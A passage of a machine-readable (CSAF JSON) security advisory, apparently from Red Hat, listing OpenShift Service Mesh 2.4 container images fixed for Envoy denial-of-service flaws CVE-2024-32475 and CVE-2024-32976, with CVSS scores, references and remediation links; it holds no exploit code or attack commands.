"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-32475",
"cwe": {
"id": "CWE-617",
"name": "Reachable Assertion"
},
"discovery_date": "2024-04-19T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2276149"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy, a cloud-native, open source edge and service proxy. When an upstream TLS cluster is used with \"auto_sni\" enabled, a request containing a \"host/:authority\" header longer than 255 characters triggers an abnormal termination of the Envoy process, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-32475"
},
{
"category": "external",
"summary": "RHBZ#2276149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276149"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-32475",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32475"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-32475",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32475"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382",
"url": "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj"
}
],
"release_date": "2024-04-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters"
},
{
"cve": "CVE-2024-32976",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-05-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2283145"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy\u0027s Brotli decompressor. This flaw allows a remote, unauthenticated attacker to trigger an infinite loop, causing a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Brotli decompressor infinite loop",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
